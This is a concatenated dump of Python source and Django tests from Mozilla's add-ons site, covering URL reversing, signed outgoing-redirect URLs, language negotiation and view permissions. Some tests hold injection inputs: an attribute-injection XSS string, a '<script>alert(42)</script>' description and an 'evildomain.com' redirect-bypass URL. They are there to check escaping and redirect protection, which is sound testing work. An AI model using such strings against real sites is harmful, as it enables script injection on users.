eq_(urlresolvers.reverse('home'), '/fr/firefox/')
eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
def test_activate_app(self):
with self.activate(app='mobile'):
eq_(urlresolvers.reverse('home'), '/en-US/mobile/')
eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
def test_activate_app_locale(self):
with self.activate(locale='de', app='thunderbird'):
eq_(urlresolvers.reverse('home'), '/de/thunderbird/')
eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
def test_redirect():
"""Make sure django.shortcuts.redirect uses our reverse."""
test.Client().get('/')
redirect = shortcuts.redirect('home')
eq_(redirect['Location'], '/en-US/firefox/')
def test_outgoing_url():
redirect_url = settings.REDIRECT_URL
secretkey = settings.REDIRECT_SECRET_KEY
exceptions = settings.REDIRECT_URL_WHITELIST
settings.REDIRECT_URL = 'http://example.net'
settings.REDIRECT_SECRET_KEY = 'sekrit'
settings.REDIRECT_URL_WHITELIST = ['nicedomain.com']
try:
myurl = 'http://example.com'
s = urlresolvers.get_outgoing_url(myurl)
# Regular URLs must be escaped.
eq_(s,
'http://example.net/bc7d4bb262c9f0b0f6d3412ede7d3252c2e311bb1d55f6'
'2315f636cb8a70913b/'
'http%3A//example.com')
# No double-escaping of outgoing URLs.
s2 = urlresolvers.get_outgoing_url(s)
eq_(s, s2)
evil = settings.REDIRECT_URL.rstrip('/') + '.evildomain.com'
s = urlresolvers.get_outgoing_url(evil)
assert_not_equal(s, evil,
'No subdomain abuse of double-escaping protection.')
nice = 'http://nicedomain.com/lets/go/go/go'
eq_(nice, urlresolvers.get_outgoing_url(nice))
finally:
settings.REDIRECT_URL = redirect_url
settings.REDIRECT_SECRET_KEY = secretkey
settings.REDIRECT_URL_WHITELIST = exceptions
def test_outgoing_url_dirty_unicode():
bad = (u'http://chupakabr.ru/\u043f\u0440\u043e\u0435\u043a\u0442\u044b/'
u'\u043c\u0443\u0437\u044b\u043a\u0430-vkontakteru/')
urlresolvers.get_outgoing_url(bad) # bug 564057
def test_outgoing_url_query_params():
url = 'http://xx.com?q=1&v=2'
fixed = urlresolvers.get_outgoing_url(url)
assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed
url = 'http://xx.com?q=1&v=2'
fixed = urlresolvers.get_outgoing_url(url)
assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed
# Check XSS vectors.
url = 'http://xx.com?q=1&v=2" style="123"'
fixed = urlresolvers.get_outgoing_url(url)
assert fixed.endswith('%3A//xx.com%3Fq=1&v=2%22%20style=%22123%22'), fixed
check = lambda x, y: eq_(urlresolvers.lang_from_accept_header(x), y)
def test_parse_accept_language():
expected = 'ga-IE', 'zh-TW', 'zh-CN', 'en-US', 'fr'
for lang in expected:
assert lang in settings.AMO_LANGUAGES, lang
d = (('ga-ie', 'ga-IE'),
# Capitalization is no big deal.
('ga-IE', 'ga-IE'),
('GA-ie', 'ga-IE'),
# Go for something less specific.
('fr-FR', 'fr'),
# Go for something more specific.
('ga', 'ga-IE'),
('ga-XX', 'ga-IE'),
# With multiple zh-XX choices, choose the first alphabetically.
('zh', 'zh-CN'),
# Default to en-us.
('xx', 'en-US'),
# Check q= sorting.
('fr,en;q=0.8', 'fr'),
('en;q=0.8,fr,ga-IE;q=0.9', 'fr'),
# Beware of invalid headers.
('en;q=wtf,fr,ga-IE;q=oops', 'en-US'),
# zh is a partial match but it's still preferred.
('zh, fr;q=0.8', 'zh-CN'),
# Caps + q= sorting.
('ga-IE,en;q=0.8,fr;q=0.6', 'ga-IE'),
('fr-fr, en;q=0.8, es;q=0.2', 'fr'),
# Consolidated languages.
('es-PE', 'es'),
)
for x, y in d:
yield check, x, y
class TestShorter(amo.tests.TestCase):
def test_no_shorter_language(self):
check('zh', 'zh-CN')
with self.settings(LANGUAGE_URL_MAP={'en-us': 'en-US'}):
check('zh', 'en-US')
########NEW FILE########
__FILENAME__ = test_utils_
import collections
from nose.tools import eq_, ok_
import amo
from amo import floor_version
from amo.utils import attach_trans_dict
from addons.models import Addon
class TestAttachTransDict(amo.tests.TestCase):
"""
Tests for attach_trans_dict. For convenience, we re-use Addon model instead
of mocking one from scratch and we rely on internal Translation unicode
implementation, because mocking django models and fields is just painful.
"""
def test_basic(self):
addon = amo.tests.addon_factory(
name='Name', description='Description <script>alert(42)</script>!',
eula='', summary='Summary', homepage='http://home.pa.ge',
developer_comments='Developer Comments', privacy_policy='Policy',
support_email='[email protected]', support_url='http://su.pport.url')
addon.save()
# Quick sanity checks: is description properly escaped? The underlying
# implementation should leave localized_string un-escaped but never use
# it for __unicode__. We depend on this behaviour later in the test.
ok_('<script>' in addon.description.localized_string)
ok_(not '<script>' in addon.description.localized_string_clean)
ok_(not '<script>' in unicode(addon.description))
# Attach trans dict.
attach_trans_dict(Addon, [addon])
ok_(isinstance(addon.translations, collections.defaultdict))
translations = dict(addon.translations)
# addon.translations is a defaultdict.
eq_(addon.translations['whatever'], [])
# No-translated fields should be absent.
eq_(addon.thankyou_note_id, None)
ok_(None not in translations)
# Build expected translations dict.
expected_translations = {
addon.eula_id: [('en-us', unicode(addon.eula))],
addon.privacy_policy_id:
[('en-us', unicode(addon.privacy_policy))],
addon.description_id: [
('en-us', unicode(addon.description))],
addon.developer_comments_id:
[('en-us', unicode(addon.developer_comments))],
addon.summary_id: [('en-us', unicode(addon.summary))],
addon.homepage_id: [('en-us', unicode(addon.homepage))],
addon.name_id: [('en-us', unicode(addon.name))],
addon.support_email_id: [('en-us', unicode(addon.support_email))],
addon.support_url_id: [('en-us', unicode(addon.support_url))]
}
eq_(translations, expected_translations)
def test_multiple_objects_with_multiple_translations(self):
addon = amo.tests.addon_factory()
addon.description = {
'fr': 'French Description',
'en-us': 'English Description'
}
addon.save()
addon2 = amo.tests.addon_factory(description='English 2 Description')
addon2.name = {
'fr': 'French 2 Name',
'en-us': 'English 2 Name',
'es': 'Spanish 2 Name'
}
addon2.save()
attach_trans_dict(Addon, [addon, addon2])
eq_(set(addon.translations[addon.description_id]),
set([('en-us', 'English Description'),
('fr', 'French Description')]))
eq_(set(addon2.translations[addon2.name_id]),
set([('en-us', 'English 2 Name'),
('es', 'Spanish 2 Name'),
('fr', 'French 2 Name')]))
def test_has_links():
html = 'a text <strong>without</strong> links'
assert not amo.utils.has_links(html)
html = 'a <a href="http://example.com">link</a> with markup'
assert amo.utils.has_links(html)
html = 'a http://example.com text link'
assert amo.utils.has_links(html)
html = 'a badly markuped <a href="http://example.com">link'
assert amo.utils.has_links(html)
def test_floor_version():
def c(x, y):
eq_(floor_version(x), y)
c(None, None)
c('', '')
c('3', '3.0')
c('3.6', '3.6')
c('3.6.22', '3.6')
c('5.0a2', '5.0')
c('8.0', '8.0')
c('8.0.10a', '8.0')
c('10.0b2pre', '10.0')
c('8.*', '8.0')
c('8.0*', '8.0')
c('8.0.*', '8.0')
c('8.x', '8.0')
c('8.0x', '8.0')
c('8.0.x', '8.0')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import json
import urllib
from django import test
from django.conf import settings
import commonware.log
import mock
from mock import patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from access import acl
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from amo.helpers import absolutify
from amo.pyquery_wrapper import PyQuery
from amo.tests import check_links
from amo.urlresolvers import reverse
from users.models import UserProfile
class Test403(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
assert self.client.login(username='[email protected]',
password='password')
def test_403_no_app(self):
response = self.client.get('/en-US/admin/')
eq_(response.status_code, 403)
self.assertTemplateUsed(response, 'amo/403.html')
def test_403_app(self):
response = self.client.get('/en-US/thunderbird/admin/', follow=True)
eq_(response.status_code, 403)
self.assertTemplateUsed(response, 'amo/403.html')
class Test404(amo.tests.TestCase):
def test_404_no_app(self):
"""Make sure a 404 without an app doesn't turn into a 500."""
# That could happen if helpers or templates expect APP to be defined.
url = reverse('amo.monitor')
response = self.client.get(url + 'nonsense')
eq_(response.status_code, 404)
self.assertTemplateUsed(response, 'amo/404.html')
def test_404_app_links(self):
res = self.client.get('/en-US/thunderbird/xxxxxxx')
eq_(res.status_code, 404)
self.assertTemplateUsed(res, 'amo/404.html')
links = pq(res.content)('[role=main] ul a[href^="/en-US/thunderbird"]')
eq_(links.length, 4)
class TestCommon(amo.tests.TestCase):
fixtures = ('base/users', 'base/global-stats', 'base/configs',
'base/addon_3615')
def setUp(self):
self.url = reverse('home')
def login(self, user=None, get=False):
email = '%[email protected]' % user
super(TestCommon, self).login(email)
if get:
return UserProfile.objects.get(email=email)
def test_tools_regular_user(self):
self.login('regular')
r = self.client.get(self.url, follow=True)
eq_(r.context['request'].amo_user.is_developer, False)
expected = [
('Tools', '#'),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
def test_tools_developer(self):
# Make them a developer.
user = self.login('regular', get=True)
AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
group = Group.objects.create(name='Staff', rules='AdminTools:View')
GroupUser.objects.create(group=group, user=user)
r = self.client.get(self.url, follow=True)
eq_(r.context['request'].amo_user.is_developer, True)
expected = [
('Tools', '#'),
('Manage My Submissions', reverse('devhub.addons')),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
def test_tools_editor(self):
self.login('editor')
r = self.client.get(self.url, follow=True)
request = r.context['request']
eq_(request.amo_user.is_developer, False)
eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
expected = [
('Tools', '#'),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
('Editor Tools', reverse('editors.home')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
def test_tools_developer_and_editor(self):
# Make them a developer.
user = self.login('editor', get=True)
AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
r = self.client.get(self.url, follow=True)
request = r.context['request']
eq_(request.amo_user.is_developer, True)
eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
expected = [
('Tools', '#'),
('Manage My Submissions', reverse('devhub.addons')),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
('Editor Tools', reverse('editors.home')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
def test_tools_admin(self):
self.login('admin')
r = self.client.get(self.url, follow=True)
request = r.context['request']
eq_(request.amo_user.is_developer, False)
eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
eq_(acl.action_allowed(request, 'Localizer', '%'), True)
eq_(acl.action_allowed(request, 'Admin', '%'), True)
expected = [
('Tools', '#'),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
('Editor Tools', reverse('editors.home')),
('Admin Tools', reverse('zadmin.home')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
def test_tools_developer_and_admin(self):
# Make them a developer.
user = self.login('admin', get=True)
AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
r = self.client.get(self.url, follow=True)
request = r.context['request']
eq_(request.amo_user.is_developer, True)
eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
eq_(acl.action_allowed(request, 'Localizer', '%'), True)
eq_(acl.action_allowed(request, 'Admin', '%'), True)
expected = [
('Tools', '#'),
('Manage My Submissions', reverse('devhub.addons')),
('Submit a New Add-on', reverse('devhub.submit.1')),
('Developer Hub', reverse('devhub.index')),
('Editor Tools', reverse('editors.home')),
('Admin Tools', reverse('zadmin.home')),
]
check_links(expected, pq(r.content)('#aux-nav .tools a'))
class TestOtherStuff(amo.tests.TestCase):
# Tests that don't need fixtures but do need redis mocked.
@mock.patch.object(settings, 'READ_ONLY', False)
def test_balloons_no_readonly(self):
response = self.client.get('/en-US/firefox/')
doc = pq(response.content)
eq_(doc('#site-notice').length, 0)
eq_(doc('#site-nonfx').length, 1)
eq_(doc('#site-welcome').length, 1)
@mock.patch.object(settings, 'READ_ONLY', True)
def test_balloons_readonly(self):
response = self.client.get('/en-US/firefox/')
doc = pq(response.content)
eq_(doc('#site-notice').length, 1)
eq_(doc('#site-nonfx').length, 1)
eq_(doc('#site-welcome').length, 1)
@mock.patch.object(settings, 'READ_ONLY', False)
def test_thunderbird_balloons_no_readonly(self):
response = self.client.get('/en-US/thunderbird/')
eq_(response.status_code, 200)
doc = pq(response.content)
eq_(doc('#site-notice').length, 0)
@mock.patch.object(settings, 'READ_ONLY', True)
def test_thunderbird_balloons_readonly(self):
response = self.client.get('/en-US/thunderbird/')
doc = pq(response.content)
eq_(doc('#site-notice').length, 1)
eq_(doc('#site-nonfx').length, 0,
'This balloon should appear for Firefox only')
eq_(doc('#site-welcome').length, 1)
def test_heading(self):
def title_eq(url, alt, text):
response = self.client.get(url, follow=True)
doc = PyQuery(response.content)
eq_(alt, doc('.site-title img').attr('alt'))
eq_(text, doc('.site-title').text())
title_eq('/firefox/', 'Firefox', 'Add-ons')
title_eq('/thunderbird/', 'Thunderbird', 'Add-ons')
title_eq('/mobile/extensions/', 'Mobile', 'Mobile Add-ons')
title_eq('/android/', 'Firefox for Android', 'Android Add-ons')
def test_login_link(self):
r = self.client.get(reverse('home'), follow=True)
doc = PyQuery(r.content)
next = urllib.urlencode({'to': '/en-US/firefox/'})
eq_('/en-US/firefox/users/login?%s' % next,
doc('.account.anonymous a')[1].attrib['href'])
def test_tools_loggedout(self):
r = self.client.get(reverse('home'), follow=True)
eq_(pq(r.content)('#aux-nav .tools').length, 0)
def test_language_selector(self):
doc = pq(test.Client().get('/en-US/firefox/').content)
eq_(doc('form.languages option[selected]').attr('value'), 'en-us')
def test_language_selector_variables(self):
r = self.client.get('/en-US/firefox/?foo=fooval&bar=barval')
doc = pq(r.content)('form.languages')
eq_(doc('input[type=hidden][name=foo]').attr('value'), 'fooval')
eq_(doc('input[type=hidden][name=bar]').attr('value'), 'barval')
@patch.object(settings, 'KNOWN_PROXIES', ['127.0.0.1'])
def test_remote_addr(self):
"""Make sure we're setting REMOTE_ADDR from X_FORWARDED_FOR."""
client = test.Client()
# Send X-Forwarded-For as it shows up in a wsgi request.
client.get('/en-US/firefox/', follow=True,
HTTP_X_FORWARDED_FOR='1.1.1.1')
eq_(commonware.log.get_remote_addr(), '1.1.1.1')
def test_jsi18n_caching(self):
# The jsi18n catalog should be cached for a long time.
# Get the url from a real page so it includes the build id.
client = test.Client()
doc = pq(client.get('/', follow=True).content)
js_url = absolutify(reverse('jsi18n'))
url_with_build = doc('script[src^="%s"]' % js_url).attr('src')
response = client.get(url_with_build, follow=True)
fmt = '%a, %d %b %Y %H:%M:%S GMT'
expires = datetime.strptime(response['Expires'], fmt)
assert (expires - datetime.now()).days >= 365
def test_mobile_link_firefox(self):
doc = pq(test.Client().get('/firefox', follow=True).content)
eq_(doc('#site-nav #more .more-mobile a').length, 1)
def test_mobile_link_nonfirefox(self):
for app in ('thunderbird', 'mobile'):
doc = pq(test.Client().get('/' + app, follow=True).content)
eq_(doc('#site-nav #more .more-mobile').length, 0)
def test_login_link(self):
# Test that the login link encodes parameters correctly.
r = test.Client().get('/?your=mom', follow=True)
doc = pq(r.content)
assert doc('.account.anonymous a')[1].attrib['href'].endswith(
'?to=%2Fen-US%2Ffirefox%2F%3Fyour%3Dmom'), ("Got %s" %
doc('.account.anonymous a')[1].attrib['href'])
r = test.Client().get(u'/ar/firefox/?q=འ')
doc = pq(r.content)
link = doc('.account.anonymous a')[1].attrib['href']
assert link.endswith('?to=%2Far%2Ffirefox%2F%3Fq%3D%25E0%25BD%25A0')
@mock.patch('amo.views.log_cef')
class TestCSP(amo.tests.TestCase):
def setUp(self):
self.url = reverse('amo.csp.report')
self.create_sample(name='csp-store-reports')
def test_get_document(self, log_cef):
eq_(self.client.get(self.url).status_code, 405)
def test_malformed(self, log_cef):
res = self.client.post(self.url, 'f', content_type='application/json')
eq_(res.status_code, 400)
def test_document_uri(self, log_cef):
url = 'http://foo.com'
self.client.post(self.url,
json.dumps({'csp-report': {'document-uri': url}}),
content_type='application/json')
eq_(log_cef.call_args[0][2]['PATH_INFO'], url)
def test_no_document_uri(self, log_cef):
self.client.post(self.url, json.dumps({'csp-report': {}}),
content_type='application/json')
eq_(log_cef.call_args[0][2]['PATH_INFO'], '/services/csp/report')
########NEW FILE########
__FILENAME__ = urlresolvers
#-*- coding: utf-8 -*-
import hashlib
import hmac
import urllib
from threading import local
from urlparse import urlparse, urlsplit, urlunsplit
import bleach
import jinja2
from django.conf import settings
from django.core import urlresolvers
from django.utils import encoding
from django.utils.translation.trans_real import parse_accept_lang_header
import amo
# Get a pointer to Django's reverse because we're going to hijack it after we
# define our own.
django_reverse = urlresolvers.reverse
# Thread-local storage for URL prefixes. Access with {get,set}_url_prefix.
_local = local()
def set_url_prefix(prefix):
"""Set ``prefix`` for the current thread."""
_local.prefix = prefix
def get_url_prefix():
"""Get the prefix for the current thread, or None."""
return getattr(_local, 'prefix', None)
def clean_url_prefixes():
"""Purge prefix cache."""
if hasattr(_local, 'prefix'):
delattr(_local, 'prefix')
def get_app_redirect(app):
"""Redirect request to another app."""
prefixer = get_url_prefix()
old_app = prefixer.app
prefixer.app = app.short
(_, _, url) = prefixer.split_path(prefixer.request.get_full_path())
new_url = prefixer.fix(url)
prefixer.app = old_app
return new_url
def reverse(viewname, urlconf=None, args=None, kwargs=None, prefix=None,
current_app=None, add_prefix=True):
"""Wraps django's reverse to prepend the correct locale and app."""
prefixer = get_url_prefix()
prefix = None
# Blank out the script prefix since we add that in prefixer.fix().
if prefixer:
prefix = prefix or '/'
url = django_reverse(viewname, urlconf, args, kwargs, prefix, current_app)
if prefixer and add_prefix:
return prefixer.fix(url)
else:
return url
# Replace Django's reverse with our own.
urlresolvers.reverse = reverse
class Prefixer(object):
def __init__(self, request):
self.request = request
split = self.split_path(request.path_info)
self.locale, self.app, self.shortened_path = split
def split_path(self, path_):
"""
Split the requested path into (locale, app, remainder).
locale and app will be empty strings if they're not found.
"""
path = path_.lstrip('/')
# Use partition instead of split since it always returns 3 parts.
first, _, first_rest = path.partition('/')
second, _, rest = first_rest.partition('/')
first_lower = first.lower()
lang, dash, territory = first_lower.partition('-')
# Check language-territory first.
if first_lower in settings.LANGUAGES:
if second in amo.APPS:
return first, second, rest
else:
return first, '', first_rest
# And check just language next.
elif dash and lang in settings.LANGUAGES:
first = lang
if second in amo.APPS:
return first, second, rest
else:
return first, '', first_rest
elif first in amo.APPS:
return '', first, first_rest
else:
if second in amo.APPS:
return '', second, rest
else:
return '', '', path
def get_app(self):
"""
Return a valid application string using the User Agent to guess. Falls
back to settings.DEFAULT_APP.
"""
ua = self.request.META.get('HTTP_USER_AGENT')
if ua:
for app in amo.APP_DETECT:
if app.matches_user_agent(ua):
return app.short
return settings.DEFAULT_APP
def get_language(self):
"""
Return a locale code that we support on the site using the
user's Accept Language header to determine which is best. This
mostly follows the RFCs but read bug 439568 for details.
"""
data = (self.request.GET or self.request.POST)
if 'lang' in data:
lang = data['lang'].lower()
if lang in settings.LANGUAGE_URL_MAP:
return settings.LANGUAGE_URL_MAP[lang]
prefix = lang.split('-')[0]
if prefix in settings.LANGUAGE_URL_MAP:
return settings.LANGUAGE_URL_MAP[prefix]
accept = self.request.META.get('HTTP_ACCEPT_LANGUAGE', '')
return lang_from_accept_header(accept)
def fix(self, path):
# Marketplace URLs are not prefixed with `/<locale>/<app>`.
return path
def get_outgoing_url(url):
"""
Bounce a URL off an outgoing URL redirector, such as outgoing.mozilla.org.
"""
if not settings.REDIRECT_URL:
return url
url_netloc = urlparse(url).netloc
# No double-escaping, and some domain names are excluded.
if (url_netloc == urlparse(settings.REDIRECT_URL).netloc
or url_netloc in settings.REDIRECT_URL_WHITELIST):
return url
url = encoding.smart_str(jinja2.utils.Markup(url).unescape())
sig = hmac.new(settings.REDIRECT_SECRET_KEY,
msg=url, digestmod=hashlib.sha256).hexdigest()
# Let '&=' through so query params aren't escaped. We probably shouldn't
# bother to quote the query part at all.
return '/'.join([settings.REDIRECT_URL.rstrip('/'), sig,
urllib.quote(url, safe='/&=')])
def linkify_bounce_url_callback(attrs, new=False):
"""Linkify callback that uses get_outgoing_url."""
attrs['href'] = get_outgoing_url(attrs['href'])
return attrs
def linkify_with_outgoing(text, nofollow=True):
"""Wrapper around bleach.linkify: uses get_outgoing_url."""
callbacks = [linkify_bounce_url_callback]
if nofollow:
callbacks.append(bleach.callbacks.nofollow)
return bleach.linkify(unicode(text), callbacks=callbacks)
def url_fix(s, charset='utf-8'):
"""Sometimes you get an URL by a user that just isn't a real
URL because it contains unsafe characters like ' ' and so on. This
function can fix some of the problems in a similar way browsers
handle data entered by the user:
>>> url_fix(u'http://de.wikipedia.org/wiki/Elf (Begriffsklärung)')
'http://de.wikipedia.org/wiki/Elf%20%28Begriffskl%C3%A4rung%29'
:param charset: The target charset for the URL if the url was
given as unicode string.
Lifted from Werkzeug.
"""
if isinstance(s, unicode):
s = s.encode(charset, 'ignore')
scheme, netloc, path, qs, anchor = urlsplit(s)
path = urllib.quote(path, '/%:')
qs = urllib.quote_plus(qs, ':&=')
return urlunsplit((scheme, netloc, path, qs, anchor))
def lang_from_accept_header(header):
# Map all our lang codes and any prefixes to the locale code.
langs = dict((k.lower(), v) for k, v in settings.LANGUAGE_URL_MAP.items())
# If we have a lang or a prefix of the lang, return the locale code.
for lang, _ in parse_accept_lang_header(header.lower()):
if lang in langs:
return langs[lang]
prefix = lang.split('-')[0]
# Downgrade a longer prefix to a shorter one if needed (es-PE > es)
if prefix in langs:
return langs[prefix]
# Upgrade to a longer one, if present (zh > zh-CN)
lookup = settings.SHORTER_LANGUAGES.get(prefix, '').lower()
if lookup and lookup in langs:
return langs[lookup]
return settings.LANGUAGE_CODE
def remora_url(url, lang=None, app=None, prefix=''):
"""
Builds a remora-style URL, independent from Zamboni's prefixer logic.
If app and/or lang are None, the current Zamboni values will be used.
To omit them from the URL, set them to ''.
"""
prefixer = get_url_prefix()
if lang is None:
lang = getattr(prefixer, 'locale', settings.LANGUAGE_CODE)
if app is None:
app = getattr(prefixer, 'app', settings.DEFAULT_APP)
url_parts = [p for p in (prefix.strip('/'), lang, app, url.lstrip('/'))
if p]
return url_fix('/' + '/'.join(url_parts))
########NEW FILE########
__FILENAME__ = urls
import csp.views
from waffle.views import wafflejs
from django.conf.urls import include, patterns, url
from django.views.decorators.cache import never_cache
from . import views
services_patterns = patterns('',
url('^monitor(.json)?$', never_cache(views.monitor),
name='amo.monitor'),
url('^loaded$', never_cache(views.loaded), name='amo.loaded'),
url('^csp/policy$', csp.views.policy, name='amo.csp.policy'),
url('^csp/report$', views.cspreport, name='amo.csp.report'),
url('^timing/record$', views.record, name='amo.timing.record'),
)
urlpatterns = patterns('',
url('^robots.txt$', views.robots, name='robots.txt'),
url(r'^wafflejs$', wafflejs, name='wafflejs'),
('^services/', include(services_patterns)),
)
########NEW FILE########
__FILENAME__ = utils
import codecs
import collections
import contextlib
import datetime
import errno
import functools
import itertools
import operator
import os
import random
import re
import shutil
import time
import unicodedata
import urllib
import urlparse
import django.core.mail
from django import http
from django.conf import settings
from django.contrib import messages
from django.core import paginator
from django.core.cache import cache
from django.core.files.storage import default_storage as storage
from django.core.files.storage import FileSystemStorage
from django.core.serializers import json
from django.core.validators import validate_slug, ValidationError
from django.forms.fields import Field
from django.http import HttpRequest
from django.utils import translation
from django.utils.encoding import smart_str, smart_unicode
from django.utils.functional import Promise
from django.utils.http import urlquote
import bleach
import chardet
import elasticutils.contrib.django as elasticutils
import html5lib
import jinja2
import pytz
from babel import Locale
from cef import log_cef as _log_cef
from django_statsd.clients import statsd
from easy_thumbnails import processors
from html5lib.serializer.htmlserializer import HTMLSerializer
from jingo import env
from PIL import Image, ImageFile, PngImagePlugin
from amo import ADDON_ICON_SIZES
from amo.urlresolvers import linkify_with_outgoing, reverse
from translations.models import Translation
from users.models import UserNotification
from . import logger_log as log
heka = settings.HEKA
days_ago = lambda n: datetime.datetime.now() - datetime.timedelta(days=n)
def urlparams(url_, hash=None, **query):
"""
Add a fragment and/or query paramaters to a URL.
New query params will be appended to exising parameters, except duplicate
names, which will be replaced.
"""
url = urlparse.urlparse(url_)
fragment = hash if hash is not None else url.fragment
# Use dict(parse_qsl) so we don't get lists of values.
q = url.query
query_dict = dict(urlparse.parse_qsl(smart_str(q))) if q else {}
query_dict.update((k, v) for k, v in query.items())
query_string = urlencode([(k, v) for k, v in query_dict.items()
if v is not None])
new = urlparse.ParseResult(url.scheme, url.netloc, url.path, url.params,
query_string, fragment)
return new.geturl()
def isotime(t):
"""Date/Time format according to ISO 8601"""
if not hasattr(t, 'tzinfo'):
return
return _append_tz(t).astimezone(pytz.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
def epoch(t):
"""Date/Time converted to seconds since epoch"""
if not hasattr(t, 'tzinfo'):
return
return int(time.mktime(_append_tz(t).timetuple()))
def _append_tz(t):
tz = pytz.timezone(settings.TIME_ZONE)
return tz.localize(t)
def sorted_groupby(seq, key):
"""
Given a sequence, we sort it and group it by a key.
key should be a string (used with attrgetter) or a function.
"""
if not hasattr(key, '__call__'):
key = operator.attrgetter(key)
return itertools.groupby(sorted(seq, key=key), key=key)
def paginate(request, queryset, per_page=20, count=None):
"""
Get a Paginator, abstracting some common paging actions.
If you pass ``count``, that value will be used instead of calling
``.count()`` on the queryset. This can be good if the queryset would
produce an expensive count query.
"""
p = (ESPaginator if isinstance(queryset, elasticutils.S)
else paginator.Paginator)(queryset, per_page)
if count is not None:
p._count = count
# Get the page from the request, make sure it's an int.
try:
page = int(request.GET.get('page', 1))
except ValueError:
page = 1
# Get a page of results, or the first page if there's a problem.
try:
paginated = p.page(page)
except (paginator.EmptyPage, paginator.InvalidPage):
paginated = p.page(1)
paginated.url = u'%s?%s' % (request.path, request.GET.urlencode())
return paginated
def send_mail(subject, message, from_email=None, recipient_list=None,
fail_silently=False, use_blacklist=True, perm_setting=None,
manage_url=None, headers=None, cc=None, real_email=False,
html_message=None, attachments=None, async=False,
max_retries=None):
"""
A wrapper around django.core.mail.EmailMessage.
Adds blacklist checking and error logging.
"""
from amo.tasks import send_email
import users.notifications as notifications
if not recipient_list:
return True
if isinstance(recipient_list, basestring):
raise ValueError('recipient_list should be a list, not a string.')
# Check against user notification settings
if perm_setting:
if isinstance(perm_setting, str):
perm_setting = notifications.NOTIFICATIONS_BY_SHORT[perm_setting]
perms = dict(UserNotification.objects
.filter(user__email__in=recipient_list,
notification_id=perm_setting.id)
.values_list('user__email', 'enabled'))
d = perm_setting.default_checked
recipient_list = [e for e in recipient_list
if e and perms.setdefault(e, d)]
# Prune blacklisted emails.
if use_blacklist:
white_list = []
for email in recipient_list:
if email and email.lower() in settings.EMAIL_BLACKLIST:
log.debug('Blacklisted email removed from list: %s' % email)
else:
white_list.append(email)
else:
white_list = recipient_list
if not from_email:
from_email = settings.DEFAULT_FROM_EMAIL
if cc:
# If not basestring, assume it is already a list.
if isinstance(cc, basestring):
cc = [cc]
if not headers:
headers = {}
def send(recipient, message, **options):
kwargs = {
'async': async,
'attachments': attachments,
'cc': cc,
'fail_silently': fail_silently,
'from_email': from_email,
'headers': headers,
'html_message': html_message,
'max_retries': max_retries,
'real_email': real_email,
}
kwargs.update(options)
# Email subject *must not* contain newlines
args = (recipient, ' '.join(subject.splitlines()), message)
if async:
return send_email.delay(*args, **kwargs)
else:
return send_email(*args, **kwargs)
if white_list:
result = send(recipient_list, message=message,
html_message=html_message, attachments=attachments)
else:
result = True
return result
def send_mail_jinja(subject, template, context, *args, **kwargs):
"""Sends mail using a Jinja template with autoescaping turned off.
Jinja is especially useful for sending email since it has whitespace
control.
"""
# Get a jinja environment so we can override autoescaping for text emails.
autoescape_orig = env.autoescape
env.autoescape = False
template = env.get_template(template)
msg = send_mail(subject, template.render(context), *args, **kwargs)
env.autoescape = autoescape_orig
return msg
def send_html_mail_jinja(subject, html_template, text_template, context,
*args, **kwargs):
"""Sends HTML mail using a Jinja template with autoescaping turned off."""
autoescape_orig = env.autoescape
env.autoescape = False
html_template = env.get_template(html_template)
text_template = env.get_template(text_template)
msg = send_mail(subject, text_template.render(context),
html_message=html_template.render(context), *args,
**kwargs)
env.autoescape = autoescape_orig
return msg
class JSONEncoder(json.DjangoJSONEncoder):
def default(self, obj):
from versions.models import ApplicationsVersions
unicodable = (Translation, Promise)
if isinstance(obj, unicodable):
return unicode(obj)
if isinstance(obj, ApplicationsVersions):
return {unicode(obj.application): {'min': unicode(obj.min),
'max': unicode(obj.max)}}
return super(JSONEncoder, self).default(obj)
def chunked(seq, n):
"""
Yield successive n-sized chunks from seq.
>>> for group in chunked(range(8), 3):
... print group
[0, 1, 2]
[3, 4, 5]
[6, 7]
"""
seq = iter(seq)
while 1:
rv = list(itertools.islice(seq, 0, n))
if not rv:
break
yield rv
def urlencode(items):
"""A Unicode-safe URLencoder."""
try:
return urllib.urlencode(items)
except UnicodeEncodeError:
return urllib.urlencode([(k, smart_str(v)) for k, v in items])
def randslice(qs, limit, exclude=None):
"""
Get a random slice of items from ``qs`` of size ``limit``.
There will be two queries. One to find out how many elements are in ``qs``
and another to get a slice. The count is so we don't go out of bounds.
If exclude is given, we make sure that pk doesn't show up in the slice.
This replaces qs.order_by('?')[:limit].
"""
cnt = qs.count()
# Get one extra in case we find the element that should be excluded.
if exclude is not None:
limit += 1
rand = 0 if limit > cnt else random.randint(0, cnt - limit)
slice_ = list(qs[rand:rand + limit])
if exclude is not None:
slice_ = [o for o in slice_ if o.pk != exclude][:limit - 1]
return slice_
# Extra characters outside of alphanumerics that we'll allow.
SLUG_OK = '-_~'
